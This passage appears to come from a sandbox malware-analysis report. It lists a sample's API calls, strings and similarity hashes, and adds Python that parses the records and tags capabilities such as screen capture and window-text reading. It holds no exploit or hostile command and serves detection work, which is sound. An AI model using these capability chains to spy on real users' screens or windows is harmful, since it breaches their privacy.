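• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
"""

# One API bullet: optional subcall prefix, Name.MODULE, optional (args), ref: addr.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# One "• Key: value" bullet of the Similarity section.
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                 # int for a recovered constant, None for '?'
    ref: int                   # address of the call site
    subcall_of: Optional[int] = None   # callee address for indented entries


@dataclass
class FunctionListing:
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)


def _parse_args(text):
    """'?,00000007,00000000' -> [None, 7, 0]; no parentheses -> []."""
    if text is None or text.strip() == "":
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_listing(text):
    """Parse one function block of the report into a FunctionListing."""
    listing = FunctionListing()
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTION_HEADERS:
            section = stripped
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub = m.group("sub")
                listing.apis.append(ApiCall(
                    name=m.group("name"), module=m.group("module"),
                    args=_parse_args(m.group("args")),
                    ref=int(m.group("ref"), 16),
                    subcall_of=int(sub, 16) if sub else None))
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                listing.similarity[m.group("key").strip()] = m.group("value").strip()
    return listing


def direct_api_set(listing):
    """Module-qualified names of the calls the function makes itself.
    Subcall entries are left out so two functions that share a helper
    do not look alike on that account alone."""
    return sorted({f"{c.module}!{c.name}"
                   for c in listing.apis if c.subcall_of is None})


def constant_args(listing, api_name):
    """(call site, recovered constants) for every call of one API, e.g. the
    flag word passed to MessageBoxW or the message ID given to SendMessageW."""
    return [(c.ref, [a for a in c.args if a is not None])
            for c in listing.apis if c.name == api_name]


def api_id_tokens(listing):
    """The report's 'API ID' string joins name fragments with '$'; split it."""
    return listing.similarity.get("API ID", "").split("$")


if __name__ == "__main__":
    lst = parse_listing(SAMPLE)
    print(direct_api_set(lst))
    print(constant_args(lst, "MessageBoxW"))
    print(api_id_tokens(lst))
```

Feeding every function block of a report through `parse_listing` and hashing `direct_api_set` gives a cheap way to spot functions that recur across samples before falling back to the opcode or instruction fuzzy hashes the report already carries.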
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00461678
• _wcslen.LIBCMT ref: 00461683
• __swprintf.LIBCMT ref: 00461721
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
• GetClassNameW.USER32(?,?,00000400), ref: 00461811
• GetDlgCtrlID.USER32(?), ref: 00461869
• GetWindowRect.USER32(?,?), ref: 004618A4
• GetParent.USER32(?), ref: 004618C3
• ScreenToClient.USER32(00000000), ref: 004618CA
• GetClassNameW.USER32(?,?,00000100), ref: 00461941
• GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
• Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
• Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
• Opcode ID: 1916d1f944177accc8fa450b86a52df0f0c761bf2b05309f5d2a3d4fedb07dbb
• Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
• Opcode Fuzzy Hash: 1916d1f944177accc8fa450b86a52df0f0c761bf2b05309f5d2a3d4fedb07dbb
• Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
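The API chains in the function records above are the evidence an analyst turns into capability tags: GetClassNameW/GetWindowRect/GetParent/ScreenToClient/GetWindowTextW at 00461678 walks windows and reads their text, GetMenuItemInfoW/SetMenuItemInfoW/Sleep at 0045FDDB manipulates a menu, and GetDC/CreateCompatibleBitmap/CreateCompatibleDC/SelectObject/StretchBlt/GetDIBits at 0043143E is the textbook GDI screenshot with the StretchBlt raster op 00CC0020 (SRCCOPY); the record that follows adds mciSendStringW, the MCI interface that opens multimedia devices. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses the report's "Name.MODULE(args), ref: ADDR" lines, distinguishes direct calls from "Part of subcall function" entries, and matches each record against ordered API chains. The signature names are the editor's own choice, and the input records are constructed by copying the API lines from the records on this page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One "APIs" line from a Joe Sandbox function record, e.g.
#   StretchBlt.GDI32(00000000,...,00CC0020), ref: 004314CC
#   _wcslen.LIBCMT ref: 00461683
#   Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
API_LINE = re.compile(
    r"(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

SRCCOPY = 0x00CC0020  # StretchBlt/BitBlt raster op: plain copy of the source

# Capability signatures as ordered API chains (names chosen by the editor,
# hypothetical, not Joe Sandbox signature names). Other calls may sit between
# the chain elements; only their relative order must hold.
SIGNATURES: Dict[str, Tuple[str, ...]] = {
    "screen_capture_gdi": ("GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC",
                           "SelectObject", "StretchBlt", "GetDIBits"),
    "window_enumeration": ("GetClassNameW", "GetWindowRect", "GetParent",
                           "ScreenToClient", "GetWindowTextW"),
    "menu_manipulation": ("GetMenuItemInfoW", "SetMenuItemInfoW", "Sleep"),
    "mci_device_control": ("mciSendStringW",),
}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the report shows '?'
    ref: int                         # call-site address
    subcall: bool                    # True for "Part of subcall function" lines


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for lines that are not API calls."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = tuple(None if a.strip() == "?" else int(a, 16)
                 for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), m.group("sub") is not None)


def is_subsequence(needle: Tuple[str, ...], haystack: List[str]) -> bool:
    """True if every element of needle occurs in haystack in the same order."""
    it = iter(haystack)
    return all(any(h == n for h in it) for n in needle)


def tag_calls(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Capability tags whose API chain is an ordered subsequence of the calls."""
    names = [c.name for c in calls if include_subcalls or not c.subcall]
    return [cap for cap, chain in SIGNATURES.items() if is_subsequence(chain, names)]


def stretchblt_rop(calls: List[ApiCall]) -> Optional[int]:
    """Raster op passed to StretchBlt (its last argument), if the report shows it."""
    for c in calls:
        if c.name == "StretchBlt" and c.args:
            return c.args[-1]
    return None


def tag_report(records: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Tag every function record (name -> list of its API lines)."""
    out: Dict[str, List[str]] = {}
    for fn, lines in records.items():
        calls = [c for c in map(parse_api_line, lines) if c is not None]
        out[fn] = tag_calls(calls)
    return out


# Constructed input: API lines copied from the function records on this page.
RECORDS: Dict[str, List[str]] = {
    "fn_00461678": [
        "GetClassNameW.USER32(?,?,00000100), ref: 00461678",
        "_wcslen.LIBCMT ref: 00461683",
        "__swprintf.LIBCMT ref: 00461721",
        "SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794",
        "GetClassNameW.USER32(?,?,00000400), ref: 00461811",
        "GetDlgCtrlID.USER32(?), ref: 00461869",
        "GetWindowRect.USER32(?,?), ref: 004618A4",
        "GetParent.USER32(?), ref: 004618C3",
        "ScreenToClient.USER32(00000000), ref: 004618CA",
        "GetClassNameW.USER32(?,?,00000100), ref: 00461941",
        "GetWindowTextW.USER32(?,?,00000400), ref: 0046197E",
    ],
    "fn_0045FDDB": [
        "GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB",
        "SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14",
        "Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26",
    ],
    "fn_0043143E": [
        "GetDC.USER32(00000000), ref: 0043143E",
        "CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F",
        "CreateCompatibleDC.GDI32(00000000), ref: 00431459",
        "SelectObject.GDI32(00000000,?), ref: 00431466",
        "StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC",
        "GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505",
    ],
    "fn_0045DB32": [
        "Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C",
        "Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0",
        "GetDriveTypeW.KERNEL32 ref: 0045DB32",
        "mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78",
        "mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3",
        "mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED",
    ],
}

if __name__ == "__main__":
    for fn, tags in tag_report(RECORDS).items():
        print(fn, tags)
```

Ordered-subsequence matching, rather than an unordered set of imports, is what keeps the screenshot signature from firing on any binary that merely links GDI32: the chain GetDC, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits is the order a capture must follow, and the raster op can be checked on top of it. Subcall entries are excluded by default because the report attributes them to a callee, so a helper such as CharLowerBuffW should not count toward the caller's capability.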
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1976180769-4113822522
• Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
• Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
• Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
• Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
APIs
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__fassign
• String ID:
• API String ID: 461458858-0
• Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
• Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
• GlobalLock.KERNEL32(00000000), ref: 004300F6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• GlobalUnlock.KERNEL32(00000000), ref: 0043010C
• CloseHandle.KERNEL32(00000000), ref: 00430113
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• GlobalFree.KERNEL32(00000000), ref: 00430150
• GetObjectW.GDI32(?,00000018,?), ref: 00430177
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
• DeleteObject.GDI32(?), ref: 004301D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
• Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
• Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
APIs
Strings
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
• String ID: 0
• API String ID: 956284711-4108050209
• Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
• Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Opcode ID: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
• Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
• Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1350042424-0
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
• _wprintf.LIBCMT ref: 0045E8D7
Strings
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-2354261254
APIs
Strings
Similarity
• API ID: __swprintf_wcscpy$__i64tow__itow
• String ID: %.15g$0x%p$False$True
• API String ID: 3038501623-2263619337
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
• __swprintf.LIBCMT ref: 0045E5F6
• _wprintf.LIBCMT ref: 0045E6A3
• _wprintf.LIBCMT ref: 0045E6C7
Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-8599901
• Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
• Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
• Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
• Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(00000000), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(00000000), ref: 00443C3A
• EndDialog.USER32(00000000,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
• String ID: BUTTON
• API String ID: 1834419854-3405671355
• Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
